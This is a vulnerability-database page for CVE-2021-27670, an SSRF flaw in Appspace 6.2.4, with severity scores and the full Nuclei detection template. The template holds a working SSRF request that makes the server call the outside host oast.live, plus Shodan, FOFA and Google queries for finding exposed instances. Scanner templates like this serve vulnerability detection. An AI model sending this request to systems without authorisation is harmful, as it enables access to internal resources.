Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27670
HistoryJul 25, 2023 - 9:07 a.m.

Appspace 6.2.4 - Server-Side Request Forgery

2023-07-2509:07:18
ProjectDiscovery
github.com
8
cve
cve2021
appspace
ssrf

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.566

Percentile

97.7%

Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.

id: CVE-2021-27670

info:
  name: Appspace 6.2.4 - Server-Side Request Forgery
  author: ritikchaddha
  severity: critical
  description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: |
    Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/h3110mb/PoCSSrfApp
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27670
    - https://github.com/ArrestX/--POC
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27670
    cwe-id: CWE-918
    epss-score: 0.61228
    epss-percentile: 0.97796
    cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: appspace
    product: appspace
    shodan-query:
      - title:"Appspace"
      - http.title:"appspace"
    fofa-query: title="appspace"
    google-query: intitle:"appspace"
  tags: cve,cve2021,appspace,ssrf

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"

      - type: status
        status:
          - 200
# digest: 490a0046304402205415eedc43536bf50687094ab55d201c96e6d11aee855c35e9e2bd78e2a139420220127c277cdfae46eab2317d4efcda6c7096d437af1dad6d3744b5867edb1514c9:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.566

Percentile

97.7%

Related for NUCLEI:CVE-2021-27670